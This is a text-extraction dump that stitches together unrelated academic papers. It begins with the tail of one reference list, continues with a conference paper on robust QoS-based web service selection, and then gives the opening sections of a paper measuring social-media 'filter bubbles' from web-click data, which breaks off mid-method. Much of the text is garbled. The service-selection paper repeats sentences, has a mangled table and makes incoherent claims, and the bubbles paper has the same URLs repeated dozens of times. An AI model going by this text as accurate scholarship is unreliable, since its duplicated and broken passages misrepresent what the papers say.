Systems, Volume 28, pages 2377–2385. 377 Ilya Sutskever, Oriol Vinyals, and Quoc V. Le. 2014. Se- quence to sequence learning with neural networks. In Advances in Neural Information Processing Systems, Volume 27, pages 3104–3112. Yulia Tsvetkov, Sunayana Sitaram, Manaal Faruqui, Guillaume Lample, Patrick Littell, David Mortensen, Alan W. Black, Lori Levin, and Chris Dyer. 2016. Polyglot neural language models: A case study in cross-lingual phonetic representation learning. In Pro- ceedings of the 2016 Conference of the North Ameri- can Chapter of the Association for Computational Lin- guistics, pages 1357–1366. Yonghui Wu, Mike Schuster, Zhifeng Chen, Quoc V. Le, Mohammad Norouzi, Wolfgang Macherey, Maxim Krikun, Yuan Cao, Qin Gao, Klaus Macherey, Jeff Klingner, Apurva Shah, Melvin Johnson, Xiaobing Liu, Lukasz Kaiser, Stephan Gouws, Yoshikiyo Kato, Taku Kudo, Hideto Kazawa, Keith Stevens, George Kurian, Nishant Patil, Wei Wang, Cliff Young, Jason Smith, Jason Riesa, Alex Rudnick, Oriol Vinyals, Greg Corrado, Macduff Hughes, and Jeffrey Dean. 2016. Google’s neural machine translation system: Bridg- ing the gap between human and machine translation. arXiv preprint arXiv:1609.08144. Yijun Xiao and Kyunghyun Cho. 2016. Efficient character-level document classification by combin- ing convolution and recurrent layers. arXiv preprint arXiv:1602.00367. Xiang Zhang, Junbo Zhao, and Yann LeCun. 2015. Character-level convolutional networks for text classi- fication. In Advances in Neural Information Process- ing Systems, Volume 28, pages 649–657. 378 work_u3ht4us6svdjlmykd4tpyl36vq ---- 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 118 Research on Robust Model for Web Service Selection Wei Yanxi a* , Yu Fan b , Ma xing, Yu Haige, Yang Wenhui School of computer science and engineering Xi’an Technological University Xi’an, 710021, Shaanxi, China e-mail: b 512066020@qq.com, a 407171251@qq.com *The correspoding author Abstract—Most existing service quality models use defined Quality of Service parameters for service selection.Since a large number of uncertainties exist, the QoS performance indicators in the runtime of the composite services obtained through the model and method based on the determined QoS will be worse even beyond the range acceptable to the users. Web services can solve this problem and become the most reasonable solution in the current application environment. Web services can solve this problem and become the most reasonable solution in the current application environment. In the process of actual service delivery, the key to the failure of the service composition to meet the requirements is caused by uncertain factors. In order to solve the above problems, this paper first proposes a local optimal selection model based on uncertain QoS. The Web service selection method based on uncertain QoS has been progressing in recent years. Second, in order to reduce the time spent on selection, a redundant service selection result is given. The experimental results on the data set show that the proposed model and method can effectively select more robust services for users. Keywords-Web Service; Quality of Service; Model Robust I. INTRODUCTION The service-oriented model must have three parts, the service provider, the client of the service, and the aggregator generated by the implementation service. It is well known that the tasks performed by the service provider usually provide not only the realization of services, but also the support for related technologies. The service client is a terminal organization that specifically utilizes the application service. In practice, it is the user. Compared with the services, it is possible to integrate all services into a new service and the goals are achieved. This is usually called business process. Services must remain technically neutral and need to follow some of the internationally recognized standards as much as possible. When calling a service, you must use standardized techniques. In this article, the focus is on the in-depth discussion of the characteristics of Web services. He is a self-describing, self-contained software module that can be used over a network. The software module not only can complete the tasks and solve the problems, but also can fully represent the user and the application program to handle the transaction. As defined in the definition, the current known Web services, the main structure is to establish a more application-oriented distributed computing infrastructure. The main content of a distributed infrastructure consists of many different application modules or interacting with each other to form a virtual logic system by communicating with the network or the public network. For the current research at home and abroad, QoS-based Web service selection algorithms mainly include: exhaustive, greedy, genetic, particle swarm optimization, ant colony optimization and algorithms. What this article uses is a robust QoS-aware, reliable Web service composition algorithm that is designed using robust algorithms. This paper mainly studies how to ensure that service portfolios are robust under uncertain conditions, thus avoiding the re-planning of portfolio services to some extent. The application of robust optimization method to service selection model based on uncertain QoS is described in detail. II. WEB SERVICES DISCUSSION AND ROBUST OPTIMIZATION A. Web service features Web services are mainly distributed computer technologies, which are based on XML and Internet technologies. Platform-independent, loosely-coupled, self-contained, programmable Web-based applications are used for development-oriented, interoperable applications that can use open XML standards to describe, publish, and discover. Coordinate and configure these applications, these are all part of the full definition of Web services. The basic architecture of Web services consists of 3 participants and 3 basic operations for example, Figure 1. Service Provide Service Broker Service ProvideFind Figure 1. The basic architecture of Web services The combined strategy of Web services provides a global-wide information infrastructure for the development of Internet technology. 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 119 This continuously expanding infrastructure forms a resource-rich computing platform and forms the basis of human society's information . Therefore, a single atomic Web service can no longer satisfy the diversified and personalized needs of users. The existing Web services have become the most effective and direct resources to solve the current problems encountered. From the perspective of Web properties, Web services are loosely coupled and highly integrated. These two features are Web services. The combination offers possibilities. Resqurce Service Profel Service Service Mode Service Grounding Provides Supports D e s c r ip t io n Figure 2. Describing the relationship of information services B. The role of QoS in service selection QoS is actually a kind of ability to express Web services. If you can achieve the requests needed to respond to expectations in the application process, not only can you complete related tasks, but also the quality of service provided by different users of service providers. Introducing QoS into Web services and using QoS of Web services to distinguish Web services with similar functions are the mainstream technologies currently applied in society. QoS-based Web service selection is gradually playing an increasingly important role in service composition. The increasing complexity of component-based Web services building services in the current development and the increasing trend of their associated systems is due to the development of Web composition technologies. The problem of Web service composition is a well-known issue in mainstream development. On the one hand, Web services that run on different platforms in their heterogeneous systems can be created in different ways, or can be implemented in different languages. Or it can be provided by different suppliers, and its source and structure are various. How to choose the right Web service composition system to build the required composite service is an important research direction. C. Robust optimization overview Robust optimization has a wide range of application bases, and most of the studies on traditional optimization problems are deterministic. Establish a rationalized model in the process to ensure that it is essential for every aspect of the entire Web service process. The goal of robust optimization is to find a solution that can handle all possible uncertain data. The robust optimization proposed by Soyster is to consider the "worst case" when the disturbance is maximum, that is, to consider the most unfavorable situation, transform the uncertainty plan into a deterministic corresponding model, and obtain a robust optimal solution by solving the deterministic correspondence model. Since this model only considers the worst case, the result obtained is too "conservative", which means that this result is only a better solution for the possible realization of all uncertain data. The later research focuses on how to keep the solution optimal while maintaining the optimality of the solution. At the end of the last century, Ben-Tal and Nemirovski gave the robust equality problem of converting the linear programming to the secondary cone programming under the "ellipsoidal" uncertain set. However, after the conversion, the problem is more complicated and difficult to calculate. In 2003, Bertsimas and Sim proposed a new robust model and obtained the solution considering both optimality and robustness. At the same time, the probability of the solution violated the constraint was analyzed. Then the uncertain discrete problem was studied to solve the network flow problem. A discrete robust model is given for the object. Based on the above two theoretical methods, domestic scholars apply robust optimization to supply chain planning, network flow, and logistics planning. Generally, in the service selection process based on QoS determination, it is often necessary to aggregate different QoS attribute values of the same service as the value for calculating or comparing the same service, or to determine the same attribute of different services according to the determined combined service workflow. The aggregate becomes a global property value. However, in the case of uncertain QoS, because the description methods of QoS attributes themselves are not the same, there are differences in the description of the uncertainty of different QoS, it is difficult to use different methods of the same service to determine the value of different attributes of the same service. Get together. For example, suppose that the response time fluctuation range is [rt1, rt2] and the throughput fluctuation range is [tp1, tp2]. The smaller one is, the better, and the bigger the other is, the better is the different types, the units are different, and the numerical quantities are different. It is difficult to aggregate two attributes with uncertainty in a way that determines the model using 0-1 normalization combined with a weighted sum. At the same time, because of the uncertainty of QoS, it is difficult to obtain the uncertainty of the global QoS in the solution process according to the superposition (such as response time superposition) or continuous multiplication (such as reliability multiplication) without affecting the solution result. Therefore, this article will establish local optimization service selection model for a single QoS attribute. Assume that there are n tasks in the workflow of a composite service, and there are a large number of Web services in each task. These services can complete the task and they have different functional attributes. This article discusses the service selection under the local optimal strategy. We mention that the local optimal strategy is to select individual service classes and examine the candidate atomic service sets of each abstract service class. Workflows have control structures such as sequence, selection, loop, and parallel. Without losing the generality, it is assumed that a sequential process with 4 tasks is used as the combined service process 2018 International Conference on Sensor Network and Computer Engineering (ICSNCE 2018) 120 model in this paper, and service selection is performed for the first task in the process. III. EXPERIMENTS A. Experiment analysis The environment used in this experiment was TensorFlow-gpu 0.12.1 open source software library, Windows 7In order to verify the effectiveness of the proposed method, a prototype system of Web service test and selection management was developed in the early stage of the research. In the past, researchers usually used solving data to determine the model, using data to measure the service QoS alone, or randomly generating some values within a range for simulation. In this paper, researches and calculations are conducted on uncertain data. Uncertainty in the use of the service description cannot be confirmed by a single test or a randomly generated value. The minimum response time of the service call can reflect the level of its optimality; the maximum response time reflects the level of robustness; the expectation reflects the average response value of the response time; the variance mainly reflects the response time of each call. The deviation from the expected response time of the service, that is, the smaller the variance, the smaller the response time of service invocation and the more stable. B. Experiment Datasets Adjust the value of  . In the experiment, since  can only take values between [0,1], six values of  0,05.0,1.0,2.0,5.0,1 are chosen for solving. The specific results are shown in Table 1. TABLE I. SOLVING THE RESULT T values 1 0.8 0.5 0.4 0.2 0.3 0.05 0 service number 892 892 892 892 892 551 350 941 Z*(T) 0.54 60 0.42 68 0.31 30 0.17 32 0.10 58 0.05 94 0.00 50 0.05 63 IV. CONCLUSION This paper presents the application of robust optimization method in the selection of Web services based on uncertain QoS. On the basis of determining the QoS-based Web service selection method, considering the uncertainty of QoS, a single uncertain QoS service selection model based on the local optimal strategy is established. After the redundant service is removed, the robust optimization of the uncertain processing problem is used. The method converts and solves the service selection model based on uncertain QoS and obtains a solution that takes both robustness and optimal solution into account. In the final experiment, the paper verifies the validity of the proposed model and method, and verifies the effect of redundant service culling strategy on the efficiency of the solution. The Web service composition based on uncertain QoS has the following advantages: first, for software developers, paying attention to personalized Web service composition can improve user acceptance, enhance product competitiveness and enhance corporate reputation efficiency. Second, for users and users, the importance of personalized Web service composition can improve user productivity, reduce training and technology support costs, improve user comfort and satisfaction, and increase investment efficiency and efficiency of system construction. Third, personalized research under uncertainty will improve the accuracy of service provision, give full play to the potential of every service and the effect of other services cooperation. REFERENCES [1] S.Bing,C.Jiayong .Research and Application of Dynamic Web Service Composition Based on QoS.2013-06-08. [2] C.Ming,S.Baoning.Research and Application of Web Service Composition.2008-06-08 [3] X.Jei.Web service selection algorithm review journal.2017-06-07 [4] Y.Jian,H.Yanbo.Service-Oriented Computing--Principles .2008-03 [5] L.Wei,Y.Bing,Z.Defeng.QoS-based dynamic service portfolio journal.2017-07-25 [6] J.Zheyuan,H.Jiangbo.Dynamic QoS-Aware Web Service Selection and Combination Optimization Model.2015-06 [7] http://www.ijanmc.org/current.htm.Research and Implementation for a Class of Large-Scale Full-Range Power System Real-Time Simulator.www.ijanmc.org. [8] Gu Wei, Wang JiHua, Zhang Yan, Gui JunGuo, and Xu MeiMei. A Study and Simulation on Thermal Cycling System of CFB Boilerwww.ijanmc.org. [9] http://www.ijanmc.org/current.htm.Fine-Grained Access Control Scheme Based on Cloud Storage. http://www.ijanmc.org/201704/iccnea189-18.pdf http://www.ijanmc.org/201704/iccnea189-18.pdf http://www.ijanmc.org/201704/iccnea189-18.pdf http://www.ijanmc.org/ http://www.ijanmc.org/201704/iccnea262-44.pdf http://www.ijanmc.org/201704/iccnea262-44.pdf http://www.ijanmc.org/201704/iccnea262-44.pdf http://www.ijanmc.org/201704/iccnea262-44.pdf http://www.ijanmc.org/201704/iccnea288-45.pdf http://www.ijanmc.org/201704/iccnea288-45.pdf work_u4ffrj3lbndn5l6msbd6yagame ---- Measuring online social bubbles Submitted 1 August 2015 Accepted 16 November 2015 Published 2 December 2015 Corresponding author Dimitar Nikolov, dnikolov@indiana.edu Academic editor Mark Wilson Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.38 Copyright 2015 Nikolov et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Measuring online social bubbles Dimitar Nikolov, Diego F.M. Oliveira, Alessandro Flammini and Filippo Menczer Center for Complex Networks and Systems Research, Indiana University, Bloomington, IN, United States ABSTRACT Social media have become a prevalent channel to access information, spread ideas, and influence opinions. However, it has been suggested that social and algorithmic filtering may cause exposure to less diverse points of view. Here we quantitatively measure this kind of social bias at the collective level by mining a massive datasets of web clicks. Our analysis shows that collectively, people access information from a significantly narrower spectrum of sources through social media and email, compared to a search baseline. The significance of this finding for individual exposure is revealed by investigating the relationship between the diversity of information sources experienced by users at both the collective and individual levels in two datasets where individual users can be analyzed—Twitter posts and search logs. There is a strong correlation between collective and individual diversity, supporting the notion that when we use social media we find ourselves inside “social bubbles.” Our results could lead to a deeper understanding of how technology biases our exposure to new information. Subjects Network Science and Online Social Networks, Social Computing, World Wide Web and Web Science Keywords Bias, Diversity, Polarization, Filter bubble, Echo chamber, Web traffic INTRODUCTION The rapid adoption of the Web as a source of knowledge and a social space has made it ever more difficult for people to manage the constant stream of news and information arriving on their screens. Content providers and users have responded to this problem by adopting a wide range of tools and behaviors that filter and/or rank items in the information stream. One important result of this process has been higher personalization (Mobasher, Cooley & Srivastava, 2000)—people see more content tailored specifically to them based on their past behaviors or social networks. Recommendation systems (Ricci et al., 2011), for example, suggest items in which one is more likely to be interested based on previous purchases, past actions of similar users, or other criteria based on one’s past behavior and friends. Search engines provide personalized results as well, based on browsing histories and social connections (Google, 2009b; Google, 2009a). It is common for users themselves to adopt filters in their online behavior, whether they do this consciously or not. For example, on social platforms such as Facebook, a large portion of users are exposed to news shared by their friends (Bakshy et al., 2012; Matsa & Mitchell, 2014). Because of the limited time and attention people possess and the large popularity of online social networks, the discovery of information is being transformed How to cite this article Nikolov et al. (2015), Measuring online social bubbles. PeerJ Comput. Sci. 1:e38; DOI 10.7717/peerj-cs.38 mailto:dnikolov@indiana.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.38 http://dx.doi.org/10.7717/peerj-cs.38 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 from an individual to a social endeavor. While the tendency to selectively expose ourselves to the opinion of like-minded people was present in the pre-digital world (Hart et al., 2009; Kastenmüller et al., 2010), the ease with which we can find, follow, and focus on such people and exclude others in the online world may enhance this tendency. Regardless of whether biases in information exposure are stronger today versus in the pre-digital era, the traces of online behavior provide a valuable opportunity to quantify such biases. While useful, personalization filters—whether they are algorithmic, social, a combi- nation of both, and whether they are used with or without user awareness—have biases that affect our access to information in important ways. In one line of reasoning, Sunstein (2002), Sunstein (2009) and Pariser (2011) have argued that the reliance on personalization and social media can lead people to being exposed to a narrow set of viewpoints. According to this hypothesis, one’s existing beliefs are reinforced because they are locked inside so-called “filter bubbles” or “echo chambers,” which prevent one from engaging with ideas different from their own. Such selective exposure could facilitate confirmation bias (Baron, 2000; Nickerson, 1998) and possibly create a fertile ground for polarization and misinformed opinions (Nyhan & Reifler, 2010; McKenzie, 2004; Stanovich, West & Toplak, 2013; Silverman, 2011). These concerns are borne out to varying degrees in online user behavior data. For exam- ple, on Facebook, three filters—the social network, the feed population algorithm, and a user’s own content selection—combine to decrease exposure to ideologically challenging news from a random baseline by more than 25% for conservative users, and close to 50% for liberal users (Bakshy, Messing & Adamic, 2015). The same study however highlights the difficulty in interpreting measurements of diverse information exposure. The decrease in exposure is significant, but the random baseline represents a completely bias-free exposure, which may not occur in reality. Our exposure is biased both in our explicit choices of information sources and implicitly through homophily—our tendency to associate with like-minded friends. Each social media filter may mitigate or amplify these biases. The combination of filters on Facebook still allows for exposure to some ideologically challenging news. But how does this compare to other ways of discovering information? In a different Facebook study, users, especially partisan ones, were more likely to share articles with which they agree (An et al., 2014). Similar patterns can be seen on other plat- forms. On blogs, commenters are several times more likely to agree with each other than not (Gilbert, Bergstrom & Karahalios, 2009), and liberals and conservatives primarily link within their own communities (Adamic & Glance, 2005). On Twitter, political polarization is even more evident (Conover et al., 2011; Conover et al., 2012). When browsing news, people are more likely to be exposed to like-minded opinion pieces (Flaxman, Goel & Rao, 2013), and to stay connected and share articles with others having similar interests and values (Grevet, Terveen & Gilbert, 2014). In the context of controversial events that are highly polarizing, web sources tend to be partial and unbalanced, and only a small fraction of online readers visit more than two different sources (Koutra, Bennett & Horvitz, 2014). To respond to such narrowing of online horizons, researchers have started to concentrate Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 2/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 on more engaging presentation of disagreeable content (Doris-Down, Versee & Gilbert, 2013; Munson & Resnick, 2010; Graells-Garrido, Lalmas & Quercia, 2013). In domains outside of political discourse there is less evidence that personalization and social networks lead to filter bubbles. Recommendation systems have a diversifying effect on purchases (Hosanagar et al., 2013), and search engines have had a democratizing effect on the discovery of information, despite the popularity-based signals used in their ranking algorithms (Fortunato et al., 2006). Aspects of the filter bubble hypothesis have so far been quantified for specific platforms like blogs (Adamic & Glance, 2005), Facebook (Bakshy, Messing & Adamic, 2015), and Twitter (Conover et al., 2011), but not across different classes of information sources. Indeed, social media and blogs could be very different from other types of sites, because of the strong social influence in them. What these differences may be and how they affect information consumption is an open question. For example, on the one hand, one would imagine homophily to contribute to the formation of echo chambers in social networks. On the other hand, the abundance of weak ties between individuals in different communities (Bakshy et al., 2012) could lead to highly diverse exposure. In this study we look at the diversity of information exposure more broadly. Our goal is to examine biases inherent in different types of online activity: information search, one-to-one communication from email exchanges, and many-to-many communication captured from social media streams. How large is the diversity of information sources to which we are exposed through interpersonal communication channels, such as social media and email, compared to a baseline of information seeking? We answer this question at the collective level by analyzing a massive dataset of Web clicks. In addition, we investigate how this analysis relates to the diversity of information accessed by individual users through an analysis of two additional datasets—Twitter posts and search logs. Figure 1 illustrates our empirical analysis: we measure how the visits by people that are engaged in different types of online activities are distributed across a broad set of websites (Figs. 1A and 1C) or concentrated within a few (Figs. 1B and 1D). We carry out our analyses on all web targets as well as on targets restricted to news sites. The latter are of particular relevance when examining bias in public discourse. We do not make any additional distinctions regarding the type of content people visit, such as opinion pieces versus reporting, or differing ideological slant. We do not consider beliefs, past behaviors, or specific interests of information consumers. These deliberate choices are designed to yield quantitative measures of bias that do not depend on subjective assessments. Our results are therefore general and applicable to different topics, geographical regions, interests, and media sources. METHODS To study the diversity of information exposure we use a massive collection of Web clicks as our primary dataset, and two supplementary datasets of link shares on Twitter and AOL search clicks. Code is available to reproduce our entire data processing procedure, described next (https://github.com/dimitargnikolov/web-traffic-iu). Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 3/14 https://peerj.com/computer-science/ https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu https://github.com/dimitargnikolov/web-traffic-iu http://dx.doi.org/10.7717/peerj-cs.38 Figure 1 Diversity of information sources accessed through different online channels. Each circle represents a unique website, and its area is proportional to the number of pages accessed on that website. (A) Links clicked by a single search engine user. (B) Links shared by a single Twitter user. (C) Search traffic generated by a collection of users. (D) Social media traffic generated by a collection of users. In each case, a random sample of 50 links was taken for a period of one week. These examples illustrate typical behaviors gleaned from our data. On the left we see more heterogeneous patterns with search traffic distributed more evenly among several sources (higher Shannon entropy Ha = 5.1 and Hc = 5.4). The patterns on the right are more homogeneous, with fewer sources dominating most social traffic (lower entropy Hb = 3.1 and Hd = 4.2). Click dataset The click data we use comes from a publicly available dataset collected at the edge of the Indiana University network (Meiss et al., 2008), which allows us to obtain a trace of web requests (http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/). Each request record has a target page, a referrer (source) page, and a timestamp. Privacy concerns prevent any identifying information about individual users or clients from being collected, making it impossible to associate any request with any particular computer or person. We only use the traffic coming from self-identified browsers to filter out search engine crawlers and other bots. The data only includes traffic originating inside the Indiana University network and requesting external pages. This collection draws from a diverse population of over 100 thousand people, and spans a period of 41 months between October 2006 and May 2010. Since in the click data it is not possible to distinguish with full certainty requests result- ing from human clicks and requests auto-generated by the pages, we filter out any requests for files other than web pages, such as JavaScript, images, video, and so on based on the file extension. This results in the shrinking of the dataset by a factor of 5. Since the file exten- sion is not always present in the URL, this method is not guaranteed to remove all non- human click data. However, it provides a good first approximation of human clicks, and we further address this issue with additional data filtering described later in this section. Once non-human traffic is removed from the dataset based on file extensions, the path in the URL is discarded and the resulting clicks are only identified by the referrer and Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 4/14 https://peerj.com/computer-science/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://cnets.indiana.edu/groups/nan/webtraffic/click-dataset/ http://dx.doi.org/10.7717/peerj-cs.38 Table 1 Most frequent sources for each category of traffic and their corresponding numbers of clicks. Search Social media Email google.com (9,792,271) facebook (241,286) mail.yahoo.com (573,248) search.yahoo.com (1,753,478) reddit.com (75,706) mail.live.com (255,226) search.msn.com (552,294) twitter.com (59,471) mail.google.com (153,436) bing.com (372,819) myspace.com (49,710) webmail.aol.com (106,278) ask.com (247,314) youtube.com (45,146) hotmail.msn.com (52,325) search.naver.com (110,748) linkedin.com (8,177) webmail.iu.edu (7,217) target domains. We take referrer and target domains as proxies for websites. This level of granularity allows us to address the research question while avoiding the problem of the sparseness of the traffic at the page level—users typically visit most pages once. Even if we identify a domain with a website, not all sites are equal—wikipedia.org has more diverse content than kinseyinstitute.org. Furthermore, one needs to decide whether to represent domains at the second or higher level. In many instances, higher-level domains reflect infrastructural or organizational differences that are not important to measure diversity (e.g., m.facebook.com vs. l.facebook.com). In others cases, using second-level domains may miss important content differences (e.g., sports.yahoo.com vs. finance.yahoo.com). To address this issue, we performed our analysis using both second- and third-level domains. As discussed below, these analyses yield very similar results. In the remainder of the paper we consider second-level domains, but account for special country cases; for example, domains such as theguardian.co.uk are considered as separate websites. Once we have a definition of a website, we use the number of clicks in the data to compute a diversity measure as discussed below. After extracting the domain at the end points of each click, we examined the most popular referrers in the dataset and manually assigned them to the search, social media, and email categories. We then filtered the click data to only include referrers from these categories. In addition, we excluded targets from these same categories, because we are specifically interested in the acquisition of new information. For example, activities such as refining searches on Google and socializing on Facebook are unlikely to represent such discovery. Subsequent data filtering was performed to exclude other likely non-human traffic, such as traffic to ad and image servers, traffic resulting from game playing or using browser ap- plications such as RSS readers, and traffic to URL shortening services. Since it is impossible to exclude all non-human traffic, we focused on filtering out those target domains that constitute a significant portion of overall traffic. We used an iterative procedure in which we examined the top 100 targets for each category and manually identified traffic that is non-human. This procedure was repeated until the list of top 100 domains in each category was composed of legitimate targets. Table 1 lists the top six referrers in each category. The filtered dataset includes over 106 million records, roughly representing someone clicking on a link from a search engine, email client, or social media site, and going to one of almost 7.18 million targets outside these three categories. Nikolov et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.38 5/14 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.38 Table 2 Seed DMOZ categories for the crawler used to extract a list of close to 3,500 news sites. www.dmoz.org/News/Internet Broadcasts/ www.dmoz.org/News/Magazines and E-zines/ www.dmoz.org/News/Newspapers/ www.dmoz.org/News/Internet Broadcasts/Audio/ www.dmoz.org/Arts/Television/News/ www.dmoz.org/News/Analysis and Opinion/ www.dmoz.org/News/Alternative/ www.dmoz.org/News/Breaking News/ www.dmoz.org/News/Current Events/ www.dmoz.org/News/Extended Coverage/ News targets in the click dataset To measure diversity of information exposure in the context of news, we created a separate dataset consisting only of clicks to news targets. Due to the specific research question we are investigating, we believe it is important to build this dataset in an open and comprehensive way, including less popular news outlets. To this end, we extracted the list of news websites by traversing the DMOZ open directory (http://www.dmoz.org/) starting with the seed categories shown in Table 2 and crawling their subcategories recursively. Following the crawl, the list of news targets was filtered as follows. 1. Each URL was transformed to a canonical form and only the domain name was kept. 2. Domains falling in one of the predefined categories—search, social media and email—were removed. URLs from popular blogging platforms, Wiki platforms, and news aggregators were also removed (see Table 3). 3. An iterative filtering procedure was applied to remove targets of non-human traffic, such as from RSS clients, advertising, and content servers. The above procedure resulted in nearly 3,500 news sites. We used this list to filter the targets in the click collection, yielding the news dataset used in our analysis. Diversity measure and relationship to traffic To quantify the diversity of an information source s we look at all targets reached from websites in category s and compute the Shannon entropy Hs = −  t∈T(s) pt logpt , where T(s) is the set of target websites reached from referrer sites in s, and pt is the fraction of clicks requesting pages in website t. Entropy (Shannon, 1948) is a measure of uncertainty over a set of possible outcomes. It is maximized when all outcomes are equally likely, and minimized when only a single outcome is likely (indicating full certainty). Used over the set of domain 